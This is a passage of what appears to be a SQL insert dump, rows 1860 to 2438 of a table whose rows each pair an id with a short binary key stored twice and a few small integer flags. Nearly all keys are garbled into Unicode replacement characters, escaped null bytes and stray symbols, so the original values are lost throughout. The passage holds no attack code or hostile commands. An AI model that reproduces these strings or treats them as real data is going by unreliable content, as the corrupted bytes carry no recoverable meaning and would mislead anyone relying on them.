(1860,'%�tm','%�tm',1,0,90,0),
(1861,'4�Q','4�Q',1,0,90,0),
(1862,'*\0��\0\0i\0\0\0\0\0','*\0��\0\0i\0\0\0\0\0',1,0,90,1),
(1863,'_n�G','_n�G',1,0,90,0),
(1864,'�q�C','�q�C',1,0,90,0),
(1865,'���','���',1,0,90,0),
(1866,'ϔ5','ϔ5',1,0,90,0),
(1867,'*��\0\0\0\0\0\0\0','*��\0\0\0\0\0\0\0',1,0,90,1),
(1868,' A���\0\0\0\0\0\0\0\0',' A���\0\0\0\0\0\0\0\0',1,0,90,1),
(1869,'_�!�','_�!�',1,0,90,0),
(1870,'�>L�','�>L�',1,0,90,0),
(1871,'����','����',1,0,90,0),
(1872,'F>�','F>�',1,0,90,0),
(1873,'����','����',1,0,90,0),
(1874,'�E','�E',1,0,90,0),
(1875,'\\��','\\��',1,0,90,0),
(1876,'.��<','.��<',1,0,90,0),
(1877,'&��\0\0\0\0\0\0~@','&��\0\0\0\0\0\0~@',1,0,90,1),
(1878,'S�� ','S�� ',1,0,90,0),
(1879,'3[h=','3[h=',1,0,90,0),
(1880,'��CZ','��CZ',1,0,90,0),
(1881,'Y/�','Y/�',1,0,90,0),
(1882,'F Y�','F Y�',1,0,90,0),
(1883,'�\r�A','�\r�A',1,0,90,0),
(1884,'�2-E','�2-E',1,0,90,0),
(1885,'6�q','6�q',1,0,90,0),
(1886,'*�\0\0X\0\0\0\0\0\0\0','*�\0\0X\0\0\0\0\0\0\0',1,0,90,1),
(1887,'*G�\0C�\0\0\0\0\0\0\0','*G�\0C�\0\0\0\0\0\0\0',1,0,90,1),
(1888,'ٮ�','ٮ�',1,0,90,0),
(1889,'mFdF','mFdF',1,0,90,0),
(1890,'$�ݎ\0\\��k�|�','$�ݎ\0\\��k�|�',1,0,90,1),
(1891,'2�','2�',1,0,90,0),
(1892,'-x�\\','-x�\\',1,0,90,0),
(1893,'��>2','��>2',1,0,90,0),
(1894,'%䊛','%䊛',1,0,90,0),
(1895,'�]��','�]��',1,0,90,0),
(1896,'�hr?','�hr?',1,0,90,0),
(1897,'���<','���<',1,0,90,0),
(1898,'��ۍ','��ۍ',1,0,90,0),
(1899,'�YJ<','�YJ<',1,0,90,0),
(1900,'R�p','R�p',1,0,90,0),
(1901,'*w\"\0T\0w\"\0T','*w\"\0T\0w\"\0T',1,0,90,1),
(1902,'�<�','�<�',1,0,90,0),
(1903,'.� \n','.� \n',1,0,90,0),
(1904,'��bg','��bg',1,0,90,0),
(1905,'�w�','�w�',1,0,90,0),
(1906,'*@\0\0\0�44����b','*@\0\0\0�44����b',1,0,90,1),
(1907,'&\0X\0k+�x{ L','&\0X\0k+�x{ L',1,0,90,1),
(1908,'g�p','g�p',1,0,90,0),
(1909,'_��)','_��)',1,0,90,0),
(1910,'x7�h','x7�h',1,0,90,0),
(1911,'�0E','�0E',1,0,90,0),
(1912,'gAL','gAL',1,0,90,0),
(1913,'*G�\0\0X�\r��~�','*G�\0\0X�\r��~�',1,0,90,1),
(1914,'T�','T�',1,0,90,0),
(1915,'g.�','g.�',1,0,90,0),
(1916,'*��\0\0�\0\0\0\0܀','*��\0\0�\0\0\0\0܀',1,0,90,1),
(1917,'ё0C','ё0C',1,0,90,0),
(1918,'h���','h���',1,0,90,0),
(1919,'��)','��)',1,0,90,0),
(1920,'�\\ӛ','�\\ӛ',1,0,90,0),
(1921,'*q�\0�\0\0\0\0\0\0��','*q�\0�\0\0\0\0\0\0��',1,0,90,1),
(1922,'�S�g','�S�g',1,0,90,0),
(1923,'\'a�\n','\'a�\n',1,0,90,0),
(1924,'\'l��','\'l��',1,0,90,0),
(1925,'��%e','��%e',1,0,90,0),
(1926,'xO\"�','xO\"�',1,0,90,0),
(1927,'�o','�o',1,0,90,0),
(1928,'|��','|��',1,0,90,0),
(1929,'28','28',1,0,90,0),
(1930,'��>>','��>>',1,0,90,0),
(1931,'�DŽX','�DŽX',1,0,90,0),
(1932,'��=','��=',1,0,90,0),
(1933,'3�Z','3�Z',1,0,90,0),
(1934,'*�AQ\0\0\0\0\0\0\0','*�AQ\0\0\0\0\0\0\0',1,0,90,1),
(1935,'m=','m=',1,0,90,0),
(1936,'���','���',1,0,90,0),
(1937,'���','���',1,0,90,0),
(1938,'R��','R��',1,0,90,0),
(1939,'Jк�','Jк�',1,0,90,0),
(1940,'h��Z','h��Z',1,0,90,0),
(1941,'�n&�','�n&�',1,0,90,0),
(1942,'r���','r���',1,0,90,0),
(1943,'�Y~G','�Y~G',1,0,90,0),
(1944,'��','��',1,0,90,0),
(1945,'6�cL','6�cL',1,0,90,0),
(1946,')o�U',')o�U',1,0,90,0),
(1947,'�j','�j',1,0,90,0),
(1948,'`��','`��',1,0,90,0),
(1949,'�>L','�>L',1,0,90,0),
(1950,'��9�','��9�',1,0,90,0),
(1951,'�','�',1,0,90,0),
(1952,'6&TE','6&TE',1,0,90,0),
(1953,'�*t�','�*t�',1,0,90,0),
(1954,'.pL','.pL',1,0,90,0),
(1955,'��','��',1,0,90,0),
(1956,'$�\Z\nE�\03����~','$�\Z\nE�\03����~',1,0,90,1),
(1957,'�Չ','�Չ',1,0,90,0),
(1958,'\rsS�','\rsS�',1,0,90,0),
(1959,'��','��',1,0,90,0),
(1960,'R���','R���',1,0,90,0),
(1961,'>��','>��',1,0,90,0),
(1962,'���','���',1,0,90,0),
(1963,'�h�Q','�h�Q',1,0,90,0),
(1964,'���','���',1,0,90,0),
(1965,'%$�','%$�',1,0,90,0),
(1966,'Y.j�','Y.j�',1,0,90,0),
(1967,'ْSu','ْSu',1,0,90,0),
(1968,'QɋK','QɋK',1,0,90,0),
(1969,'%#i�','%#i�',1,0,90,0),
(1970,'�G��','�G��',1,0,90,0),
(1971,'.�(W','.�(W',1,0,90,0),
(1972,'&\0<\0\0\0\0�<���絁','&\0<\0\0\0\0�<���絁',1,0,90,1),
(1973,'�&��','�&��',1,0,90,0),
(1974,'_���','_���',1,0,90,0),
(1975,'�','�',1,0,90,0),
(1976,'-���','-���',1,0,90,0),
(1977,'E��','E��',1,0,90,0),
(1978,'z�|<','z�|<',1,0,90,0),
(1979,'��','��',1,0,90,0),
(1980,'˗--','˗--',1,0,90,0),
(1981,'�K3�','�K3�',1,0,90,0),
(1982,'*d@\0\0,�\0\0\0\0\0\0\0','*d@\0\0,�\0\0\0\0\0\0\0',1,0,90,1),
(1983,'B�E','B�E',1,0,90,0),
(1984,'�``1','�``1',1,0,90,0),
(1985,'�\0\r','�\0\r',1,0,90,0),
(1986,'�a�<','�a�<',1,0,90,0),
(1987,'[yy','[yy',1,0,90,0),
(1988,'PF�G','PF�G',1,0,90,0),
(1989,' A�%E\0\0\0\0\0\0\0\0',' A�%E\0\0\0\0\0\0\0\0',1,0,90,1),
(1990,'�|K�','�|K�',1,0,90,0),
(1991,'���','���',1,0,90,0),
(1992,'w;`J','w;`J',1,0,90,0),
(1993,'H\0ճ','H\0ճ',1,0,90,0),
(1994,'ƻw','ƻw',1,0,90,0),
(1995,'g�G','g�G',1,0,90,0),
(1996,'XciN','XciN',1,0,90,0),
(1997,'�ch�','�ch�',1,0,90,0),
(1998,'�h�8','�h�8',1,0,90,0),
(1999,' �p48T\0��W/�',' �p48T\0��W/�',1,0,90,1),
(2000,'\'c�\Z','\'c�\Z',1,0,90,0),
(2001,'���S','���S',1,0,90,0),
(2002,'*�.�\0\0\0\0\0\0\0','*�.�\0\0\0\0\0\0\0',1,0,90,1),
(2003,'�c�}','�c�}',1,0,90,0),
(2004,'�g>','�g>',1,0,90,0),
(2005,'Cކ\r','Cކ\r',1,0,90,0),
(2006,'h��@','h��@',1,0,90,0),
(2007,'��ZP','��ZP',1,0,90,0),
(2008,'h�\Z�','h�\Z�',1,0,90,0),
(2009,'*�$G\0���]�J','*�$G\0���]�J',1,0,90,1),
(2010,'*�,�\r\0\0\0\0\0\0\0','*�,�\r\0\0\0\0\0\0\0',1,0,90,1),
(2011,'J�vh','J�vh',1,0,90,0),
(2012,'*�\0�Q�\0\0\0\0\0\0\0','*�\0�Q�\0\0\0\0\0\0\0',1,0,90,1),
(2013,'*��\0\0�\0\0\0\0\0#\0','*��\0\0�\0\0\0\0\0#\0',1,0,90,1),
(2014,'*@\0\0\0\'��7���Ln','*@\0\0\0\'��7���Ln',1,0,90,1),
(2015,'�h5','�h5',1,0,90,0),
(2016,'-�u','-�u',1,0,90,0),
(2017,'�=�s','�=�s',1,0,90,0),
(2018,'E���','E���',1,0,90,0),
(2019,'�D/','�D/',1,0,90,0),
(2020,'/d=�','/d=�',1,0,90,0),
(2021,'��G{','��G{',1,0,90,0),
(2022,'��w�','��w�',1,0,90,0),
(2023,'��}%','��}%',1,0,90,0),
(2024,'��n�','��n�',1,0,90,0),
(2025,'e#<','e#<',1,0,90,0),
(2026,'*���\0\0\0\0\0\0\0','*���\0\0\0\0\0\0\0',1,0,90,1),
(2027,'%���','%���',1,0,90,0),
(2028,'R�&?','R�&?',1,0,90,0),
(2029,'jK��','jK��',1,0,90,0),
(2030,'��\0u','��\0u',1,0,90,0),
(2031,'+��1','+��1',1,0,90,0),
(2032,'ϔW�','ϔW�',1,0,90,0),
(2033,'ed�','ed�',1,0,90,0),
(2034,'%a��','%a��',1,0,90,0),
(2035,'� ','� ',1,0,90,0),
(2036,'*��\0\0\0\0\0\0\0','*��\0\0\0\0\0\0\0',1,0,90,1),
(2037,'S���','S���',1,0,90,0),
(2038,'��','��',1,0,90,0),
(2039,'QG��','QG��',1,0,90,0),
(2040,'3MO','3MO',1,0,90,0),
(2041,'ܞ�','ܞ�',1,0,90,0),
(2042,'��+u','��+u',1,0,90,0),
(2043,'4B��','4B��',1,0,90,0),
(2044,'&��\0@\0\0\0\0\0\0\0��','&��\0@\0\0\0\0\0\0\0��',1,0,90,1),
(2045,'��X�','��X�',1,0,90,0),
(2046,'gE��','gE��',1,0,90,0),
(2047,'R���','R���',1,0,90,0),
(2048,'��_>','��_>',1,0,90,0),
(2049,'�D|�','�D|�',1,0,90,0),
(2050,'��)�','��)�',1,0,90,0),
(2051,'DAx�','DAx�',1,0,90,0),
(2052,']Y�R',']Y�R',1,0,90,0),
(2053,'���','���',1,0,90,0),
(2054,'����','����',1,0,90,0),
(2055,'j4O�','j4O�',1,0,90,0),
(2056,'��X','��X',1,0,90,0),
(2057,'R�C�','R�C�',1,0,90,0),
(2058,'/l��','/l��',1,0,90,0),
(2059,'j4�s','j4�s',1,0,90,0),
(2060,'�zk1','�zk1',1,0,90,0),
(2061,'�*t�','�*t�',1,0,90,0),
(2062,'�p +','�p +',1,0,90,0),
(2063,'*��\0\0�\0\0\0\0\0:�','*��\0\0�\0\0\0\0\0:�',1,0,90,1),
(2064,'4Y}~','4Y}~',1,0,90,0),
(2065,'�]VS','�]VS',1,0,90,0),
(2066,'\\�7�','\\�7�',1,0,90,0),
(2067,'#�B�','#�B�',1,0,90,0),
(2068,'�','�',1,0,90,0),
(2069,'N.m�','N.m�',1,0,90,0),
(2070,'t2�','t2�',1,0,90,0),
(2071,'-v�[','-v�[',1,0,90,0),
(2072,'U��','U��',1,0,90,0),
(2073,'yY�L','yY�L',1,0,90,0),
(2074,'��+','��+',1,0,90,0),
(2075,' ��',' ��',1,0,90,0),
(2076,'.ek�','.ek�',1,0,90,0),
(2077,'���','���',1,0,90,0),
(2078,'R��','R��',1,0,90,0),
(2079,'�_n','�_n',1,0,90,0),
(2080,'�r','�r',1,0,90,0),
(2081,'���','���',1,0,90,0),
(2082,'$\0�\0\0\0\0�<���\n-O','$\0�\0\0\0\0�<���\n-O',1,0,90,1),
(2083,'ν�','ν�',1,0,90,0),
(2084,'�Rm>','�Rm>',1,0,90,0),
(2085,'��r','��r',1,0,90,0),
(2086,'tʺ�','tʺ�',1,0,90,0),
(2087,'�*t�','�*t�',1,0,90,0),
(2088,'�]��','�]��',1,0,90,0),
(2089,'B!؆','B!؆',1,0,90,0),
(2090,'^��L','^��L',1,0,90,0),
(2091,'/mIP','/mIP',1,0,90,0),
(2092,'�蝃','�蝃',1,0,90,0),
(2093,'U��<','U��<',1,0,90,0),
(2094,'_��','_��',1,0,90,0),
(2095,'g�\Z�','g�\Z�',1,0,90,0),
(2096,'�?�<','�?�<',1,0,90,0),
(2097,'R��)','R��)',1,0,90,0),
(2098,'g�:e','g�:e',1,0,90,0),
(2099,'$0�\0\0d�F���� 3','$0�\0\0d�F���� 3',1,0,90,1),
(2100,' A�\0U�\0\0\0\0\0\0\0\0',' A�\0U�\0\0\0\0\0\0\0\0',1,0,90,1),
(2101,'3�q�','3�q�',1,0,90,0),
(2102,'^�0','^�0',1,0,90,0),
(2103,'�E�n','�E�n',1,0,90,0),
(2104,'g� K','g� K',1,0,90,0),
(2105,'��\0','��\0',1,0,90,0),
(2106,'*o\0\0\0\0\0\0\0\0\\5`t','*o\0\0\0\0\0\0\0\0\\5`t',1,0,90,1),
(2107,'*� �\0\0\0\0\0\0\0','*� �\0\0\0\0\0\0\0',1,0,90,1),
(2108,'T&��','T&��',1,0,90,0),
(2109,'.)�0','.)�0',1,0,90,0),
(2110,'Y�� ','Y�� ',1,0,90,0),
(2111,' Hx�vN��!�',' Hx�vN��!�',1,0,90,1),
(2112,'ztɨ','ztɨ',1,0,90,0),
(2113,'-)�','-)�',1,0,90,0),
(2114,'�y�','�y�',1,0,90,0),
(2115,'gG2�','gG2�',1,0,90,0),
(2116,'*�\0\0\0\0\0\0\0\0\0\0','*�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(2117,'2t\r\\','2t\r\\',1,0,90,0),
(2118,'\'e��','\'e��',1,0,90,0),
(2119,'�*t�','�*t�',1,0,90,0),
(2120,'mFdA','mFdA',1,0,90,0),
(2121,'���','���',1,0,90,0),
(2122,'�ҋ','�ҋ',1,0,90,0),
(2123,'g��t','g��t',1,0,90,0),
(2124,'}�up','}�up',1,0,90,0),
(2125,'^ȸ','^ȸ',1,0,90,0),
(2126,'T_\Z','T_\Z',1,0,90,0),
(2127,'�YK','�YK',1,0,90,0),
(2128,'i�&�','i�&�',1,0,90,0),
(2129,'D��\\','D��\\',1,0,90,0),
(2130,'��5','��5',1,0,90,0),
(2131,'����','����',1,0,90,0),
(2132,'&|\0 \09\0\0\0\0\0\0|�','&|\0 \09\0\0\0\0\0\0|�',1,0,90,1),
(2133,'�D\n�','�D\n�',1,0,90,0),
(2134,'%.uZ','%.uZ',1,0,90,0),
(2135,'�\\�','�\\�',1,0,90,0),
(2136,'gD��','gD��',1,0,90,0),
(2137,'�E�:','�E�:',1,0,90,0),
(2138,'W�+�','W�+�',1,0,90,0),
(2139,'mFd','mFd',1,0,90,0),
(2140,'��%','��%',1,0,90,0),
(2141,'\"�>Z','\"�>Z',1,0,90,0),
(2142,'P[1\\','P[1\\',1,0,90,0),
(2143,'.���','.���',1,0,90,0),
(2144,'Jе�','Jе�',1,0,90,0),
(2145,'B��','B��',1,0,90,0),
(2146,'g���','g���',1,0,90,0),
(2147,'�az�','�az�',1,0,90,0),
(2148,'\\5`s','\\5`s',1,0,90,0),
(2149,'��M�','��M�',1,0,90,0),
(2150,'�r�m','�r�m',1,0,90,0),
(2151,'��F�','��F�',1,0,90,0),
(2152,'�y;','�y;',1,0,90,0),
(2153,'*�!8Q\0\0\0\0\0\0\0','*�!8Q\0\0\0\0\0\0\0',1,0,90,1),
(2154,'^��o','^��o',1,0,90,0),
(2155,'PB�}','PB�}',1,0,90,0),
(2156,'&���\0A�\0\0\0\0\0\0\0','&���\0A�\0\0\0\0\0\0\0',1,0,90,1),
(2157,'%�vN','%�vN',1,0,90,0),
(2158,'B��5','B��5',1,0,90,0),
(2159,'F\'��','F\'��',1,0,90,0),
(2160,'*G�\0��\0\0\0\0\0\0\0','*G�\0��\0\0\0\0\0\0\0',1,0,90,1),
(2161,'��*�','��*�',1,0,90,0),
(2162,'�1�|','�1�|',1,0,90,0),
(2163,'*Ȫ��PT\0��o��','*Ȫ��PT\0��o��',1,0,90,1),
(2164,'�,�3','�,�3',1,0,90,0),
(2165,'QE��','QE��',1,0,90,0),
(2166,'1�<','1�<',1,0,90,0),
(2167,'�H�','�H�',1,0,90,0),
(2168,'.P{','.P{',1,0,90,0),
(2169,'���Y','���Y',1,0,90,0),
(2170,'��(�','��(�',1,0,90,0),
(2171,'>f��','>f��',1,0,90,0),
(2172,'���','���',1,0,90,0),
(2173,'mFd','mFd',1,0,90,0),
(2174,' A�0\0\0\0\0\0\0\0M.',' A�0\0\0\0\0\0\0\0M.',1,0,90,1),
(2175,'QFZx','QFZx',1,0,90,0),
(2176,'*o\0\0\0\0\0\0\0��(�','*o\0\0\0\0\0\0\0��(�',1,0,90,1),
(2177,'#�B�','#�B�',1,0,90,0),
(2178,'��><','��><',1,0,90,0),
(2179,'/hO�','/hO�',1,0,90,0),
(2180,' \n�\0 *\0\0\0\0\0\0\0',' \n�\0 *\0\0\0\0\0\0\0',1,0,90,1),
(2181,'�繨','�繨',1,0,90,0),
(2182,'��','��',1,0,90,0),
(2183,'�Y�i','�Y�i',1,0,90,0),
(2184,'�:p�','�:p�',1,0,90,0),
(2185,'{�z','{�z',1,0,90,0),
(2186,'��e\'','��e\'',1,0,90,0),
(2187,'\\�P','\\�P',1,0,90,0),
(2188,'?���','?���',1,0,90,0),
(2189,'gZ��','gZ��',1,0,90,0),
(2190,'4 �R','4 �R',1,0,90,0),
(2191,'\"\\�x','\"\\�x',1,0,90,0),
(2192,'MD`�','MD`�',1,0,90,0),
(2193,'�*t�','�*t�',1,0,90,0),
(2194,'̈�','̈�',1,0,90,0),
(2195,'-z��','-z��',1,0,90,0),
(2196,'�Gą','�Gą',1,0,90,0),
(2197,'&�\0`\0\0\0\0+f-','&�\0`\0\0\0\0+f-',1,0,90,1),
(2198,'�*t�','�*t�',1,0,90,0),
(2199,'�','�',1,0,90,0),
(2200,'D��i','D��i',1,0,90,0),
(2201,'W��4','W��4',1,0,90,0),
(2202,'M�(B','M�(B',1,0,90,0),
(2203,'\r��','\r��',1,0,90,0),
(2204,'j@�','j@�',1,0,90,0),
(2205,'*�\0+�\0\0\0\0\0\0\0','*�\0+�\0\0\0\0\0\0\0',1,0,90,1),
(2206,'g��','g��',1,0,90,0),
(2207,'\"_�','\"_�',1,0,90,0),
(2208,'R���','R���',1,0,90,0),
(2209,'���','���',1,0,90,0),
(2210,'U�\Z5','U�\Z5',1,0,90,0),
(2211,'B��','B��',1,0,90,0),
(2212,'*�\n�\0\0\0\0\0\0\0','*�\n�\0\0\0\0\0\0\0',1,0,90,1),
(2213,'��(�','��(�',1,0,90,0),
(2214,'g�$','g�$',1,0,90,0),
(2215,'&�h\0 \0������P','&�h\0 \0������P',1,0,90,1),
(2216,'>��','>��',1,0,90,0),
(2217,'�h#�','�h#�',1,0,90,0),
(2218,'���','���',1,0,90,0),
(2219,'$x�\0\0\0\0\0\0\0\0\0\\�','$x�\0\0\0\0\0\0\0\0\0\\�',1,0,90,1),
(2220,'.ez:','.ez:',1,0,90,0),
(2221,'e!�','e!�',1,0,90,0),
(2222,'�*t�','�*t�',1,0,90,0),
(2223,'R�y','R�y',1,0,90,0),
(2224,'��u','��u',1,0,90,0),
(2225,'X�BK','X�BK',1,0,90,0),
(2226,'H�;�','H�;�',1,0,90,0),
(2227,'��Yz','��Yz',1,0,90,0),
(2228,'���','���',1,0,90,0),
(2229,'�*t�','�*t�',1,0,90,0),
(2230,'�\0�|','�\0�|',1,0,90,0),
(2231,'g�x�','g�x�',1,0,90,0),
(2232,'g$�','g$�',1,0,90,0),
(2233,'&\0<\0\0\0\0�<������','&\0<\0\0\0\0�<������',1,0,90,1),
(2234,'�*t�','�*t�',1,0,90,0),
(2235,'g��','g��',1,0,90,0),
(2236,'g��','g��',1,0,90,0),
(2237,'Y,m�','Y,m�',1,0,90,0),
(2238,'3S�`','3S�`',1,0,90,0),
(2239,'��X','��X',1,0,90,0),
(2240,'���','���',1,0,90,0),
(2241,'e+�','e+�',1,0,90,0),
(2242,'�VG�','�VG�',1,0,90,0),
(2243,'�@�s','�@�s',1,0,90,0),
(2244,'-�','-�',1,0,90,0),
(2245,'�?�A','�?�A',1,0,90,0),
(2246,'�4{�','�4{�',1,0,90,0),
(2247,'\r�� ','\r�� ',1,0,90,0),
(2248,'�P��','�P��',1,0,90,0),
(2249,'P','P',1,0,90,0),
(2250,'��!\'','��!\'',1,0,90,0),
(2251,'g��','g��',1,0,90,0),
(2252,'6\'�D','6\'�D',1,0,90,0),
(2253,'���','���',1,0,90,0),
(2254,'�~�|','�~�|',1,0,90,0),
(2255,'Y�k;','Y�k;',1,0,90,0),
(2256,'g��','g��',1,0,90,0),
(2257,'*G�\0��\0\0\0\0\0\0\0','*G�\0��\0\0\0\0\0\0\0',1,0,90,1),
(2258,'զV)','զV)',1,0,90,0),
(2259,'����','����',1,0,90,0),
(2260,'|�N','|�N',1,0,90,0),
(2261,'�h)','�h)',1,0,90,0),
(2262,'&��\0\0�\0\0\0\0\"r�','&��\0\0�\0\0\0\0\"r�',1,0,90,1),
(2263,'���~','���~',1,0,90,0),
(2264,'���n','���n',1,0,90,0),
(2265,'Y:\Z�','Y:\Z�',1,0,90,0),
(2266,'QX5^','QX5^',1,0,90,0),
(2267,'+���','+���',1,0,90,0),
(2268,'t8\"','t8\"',1,0,90,0),
(2269,'���\n','���\n',1,0,90,0),
(2270,'&\0<\0\0\0\0\0�<���`��','&\0<\0\0\0\0\0�<���`��',1,0,90,1),
(2271,'QX4�','QX4�',1,0,90,0),
(2272,'��Ȝ','��Ȝ',1,0,90,0),
(2273,'���>','���>',1,0,90,0),
(2274,'�/��','�/��',1,0,90,0),
(2275,'_�+','_�+',1,0,90,0),
(2276,'��.c','��.c',1,0,90,0),
(2277,'+��','+��',1,0,90,0),
(2278,'g�','g�',1,0,90,0),
(2279,'�\\�n','�\\�n',1,0,90,0),
(2280,'��\"�','��\"�',1,0,90,0),
(2281,'�\\c','�\\c',1,0,90,0),
(2282,'*Ȫ�\0PT\0��f\"P','*Ȫ�\0PT\0��f\"P',1,0,90,1),
(2283,'��r(','��r(',1,0,90,0),
(2284,'$�\Z �M\0:���N�v:','$�\Z �M\0:���N�v:',1,0,90,1),
(2285,'g�z�','g�z�',1,0,90,0),
(2286,'g��6','g��6',1,0,90,0),
(2287,'ak��','ak��',1,0,90,0),
(2288,'���B','���B',1,0,90,0),
(2289,'�O��','�O��',1,0,90,0),
(2290,'�\r\n\"','�\r\n\"',1,0,90,0),
(2291,'£�r','£�r',1,0,90,0),
(2292,'�E�*','�E�*',1,0,90,0),
(2293,'�e','�e',1,0,90,0),
(2294,'xm','xm',1,0,90,0),
(2295,'h�Z�','h�Z�',1,0,90,0),
(2296,';j',';j',1,0,90,0),
(2297,'�i�D','�i�D',1,0,90,0),
(2298,'R� y','R� y',1,0,90,0),
(2299,'*\0�\0\0\0\0\0�rau','*\0�\0\0\0\0\0�rau',1,0,90,1),
(2300,'�Fe','�Fe',1,0,90,0),
(2301,'��e!','��e!',1,0,90,0),
(2302,'%x��','%x��',1,0,90,0),
(2303,'�Z�','�Z�',1,0,90,0),
(2304,'��5','��5',1,0,90,0),
(2305,'��9N','��9N',1,0,90,0),
(2306,'ak��','ak��',1,0,90,0),
(2307,'Q�(','Q�(',1,0,90,0),
(2308,'mFdE','mFdE',1,0,90,0),
(2309,'�,�','�,�',1,0,90,0),
(2310,'-�\Z','-�\Z',1,0,90,0),
(2311,' A�&j\0\0\0\0\0\0\0\0',' A�&j\0\0\0\0\0\0\0\0',1,0,90,1),
(2312,'3Y�p','3Y�p',1,0,90,0),
(2313,'\\̓-','\\̓-',1,0,90,0),
(2314,'�c','�c',1,0,90,0),
(2315,'�kqe','�kqe',1,0,90,0),
(2316,'���','���',1,0,90,0),
(2317,'�\\�','�\\�',1,0,90,0),
(2318,'�*t�','�*t�',1,0,90,0),
(2319,'�&XP','�&XP',1,0,90,0),
(2320,'ʏo�','ʏo�',1,0,90,0),
(2321,'��}','��}',1,0,90,0),
(2322,'*�ba�\0\0\0\0\0\0\0','*�ba�\0\0\0\0\0\0\0',1,0,90,1),
(2323,'�z<�','�z<�',1,0,90,0),
(2324,'����','����',1,0,90,0),
(2325,'��q�','��q�',1,0,90,0),
(2326,'MQ�0','MQ�0',1,0,90,0),
(2327,'_կ4','_կ4',1,0,90,0),
(2328,'ga~','ga~',1,0,90,0),
(2329,'T(h','T(h',1,0,90,0),
(2330,'��J','��J',1,0,90,0),
(2331,'��e#','��e#',1,0,90,0),
(2332,'��9','��9',1,0,90,0),
(2333,'�*t�','�*t�',1,0,90,0),
(2334,'�A ','�A ',1,0,90,0),
(2335,'m�݆','m�݆',1,0,90,0),
(2336,'eș','eș',1,0,90,0),
(2337,'�*t�','�*t�',1,0,90,0),
(2338,'*G�\0i�\0\0\0\0\0\0\0','*G�\0i�\0\0\0\0\0\0\0',1,0,90,1),
(2339,'���V','���V',1,0,90,0),
(2340,'U���','U���',1,0,90,0),
(2341,'R^�','R^�',1,0,90,0),
(2342,'νQ','νQ',1,0,90,0),
(2343,'/a�','/a�',1,0,90,0),
(2344,'-��w','-��w',1,0,90,0),
(2345,'X�$R','X�$R',1,0,90,0),
(2346,'g���','g���',1,0,90,0),
(2347,'4�b�','4�b�',1,0,90,0),
(2348,'��N','��N',1,0,90,0),
(2349,'*r�\0\0\0���\0\"�','*r�\0\0\0���\0\"�',1,0,90,1),
(2350,'&\0<\0\0\0\0�<����|�','&\0<\0\0\0\0�<����|�',1,0,90,1),
(2351,'=�','=�',1,0,90,0),
(2352,'��W','��W',1,0,90,0),
(2353,'��e ','��e ',1,0,90,0),
(2354,'$\0�\0\0\0\0�<�����','$\0�\0\0\0\0�<�����',1,0,90,1),
(2355,'�*t�','�*t�',1,0,90,0),
(2356,'_�U','_�U',1,0,90,0),
(2357,'.���','.���',1,0,90,0),
(2358,' A�\0?�\0\0\0\0\0\0\0\0',' A�\0?�\0\0\0\0\0\0\0\0',1,0,90,1),
(2359,'���C','���C',1,0,90,0),
(2360,'�]�','�]�',1,0,90,0),
(2361,'�!N','�!N',1,0,90,0),
(2362,'�NC','�NC',1,0,90,0),
(2363,'3SS�','3SS�',1,0,90,0),
(2364,'mFdC','mFdC',1,0,90,0),
(2365,'.f�','.f�',1,0,90,0),
(2366,'�L�','�L�',1,0,90,0),
(2367,' ��\0\0\0\0\0\0\0',' ��\0\0\0\0\0\0\0',1,0,90,1),
(2368,'g�=','g�=',1,0,90,0),
(2369,'ʙ\']','ʙ\']',1,0,90,0),
(2370,'�*t�','�*t�',1,0,90,0),
(2371,'mFdG','mFdG',1,0,90,0),
(2372,'|��T','|��T',1,0,90,0),
(2373,'VbG','VbG',1,0,90,0),
(2374,'�v','�v',1,0,90,0),
(2375,'�*t�','�*t�',1,0,90,0),
(2376,'�#$ ','�#$ ',1,0,90,0),
(2377,'��','��',1,0,90,0),
(2378,'3D�','3D�',1,0,90,0),
(2379,'AmdW','AmdW',1,0,90,0),
(2380,'QX4�','QX4�',1,0,90,0),
(2381,'�|�','�|�',1,0,90,0),
(2382,'����','����',1,0,90,0),
(2383,'���J','���J',1,0,90,0),
(2384,'���','���',1,0,90,0),
(2385,'�<','�<',1,0,90,0),
(2386,'3O��','3O��',1,0,90,0),
(2387,'*\0�`\0�\r���!6','*\0�`\0�\r���!6',1,0,90,1),
(2388,'8�4','8�4',1,0,90,0),
(2389,'3�','3�',1,0,90,0),
(2390,'.&��','.&��',1,0,90,0),
(2391,'QX4�','QX4�',1,0,90,0),
(2392,'���','���',1,0,90,0),
(2393,'mFd','mFd',1,0,90,0),
(2394,'��v','��v',1,0,90,0),
(2395,'\\��t','\\��t',1,0,90,0),
(2396,'\\5`�','\\5`�',1,0,90,0),
(2397,'��n','��n',1,0,90,0),
(2398,'��\\/','��\\/',1,0,90,0),
(2399,'��(','��(',1,0,90,0),
(2400,'��Tf','��Tf',1,0,90,0),
(2401,'���.','���.',1,0,90,0),
(2402,'���','���',1,0,90,0),
(2403,'C�*y','C�*y',1,0,90,0),
(2404,'F#Dž','F#Dž',1,0,90,0),
(2405,'.��A','.��A',1,0,90,0),
(2406,'*o\0\0\0\0\0\0\0\0\\5`�','*o\0\0\0\0\0\0\0\0\\5`�',1,0,90,1),
(2407,'k��','k��',1,0,90,0),
(2408,'�*t�','�*t�',1,0,90,0),
(2409,'\\��!','\\��!',1,0,90,0),
(2410,'*@\0\0\0}x0%��xى','*@\0\0\0}x0%��xى',1,0,90,1),
(2411,'����','����',1,0,90,0),
(2412,'��(�','��(�',1,0,90,0),
(2413,'g��\Z','g��\Z',1,0,90,0),
(2414,'�}y','�}y',1,0,90,0),
(2415,'-�','-�',1,0,90,0),
(2416,'>f��','>f��',1,0,90,0),
(2417,'���3','���3',1,0,90,0),
(2418,'@�)�','@�)�',1,0,90,0),
(2419,'ˏYV','ˏYV',1,0,90,0),
(2420,'^���','^���',1,0,90,0),
(2421,'�F%2','�F%2',1,0,90,0),
(2422,'$@��\0���B','$@��\0���B',1,0,90,1),
(2423,'��','��',1,0,90,0),
(2424,'��e%','��e%',1,0,90,0),
(2425,'��+�','��+�',1,0,90,0),
(2426,'|��','|��',1,0,90,0),
(2427,'�H(Z','�H(Z',1,0,90,0),
(2428,'�ao.','�ao.',1,0,90,0),
(2429,'�*t�','�*t�',1,0,90,0),
(2430,'H�h�','H�h�',1,0,90,0),
(2431,'g��','g��',1,0,90,0),
(2432,'-Sh�','-Sh�',1,0,90,0),
(2433,'XEk','XEk',1,0,90,0),
(2434,'��[�','��[�',1,0,90,0),
(2435,'��a','��a',1,0,90,0),
(2436,'c��','c��',1,0,90,0),
(2437,')B��',')B��',1,0,90,0),
(2438,'h�A�','h�A�',1,0,90,0),
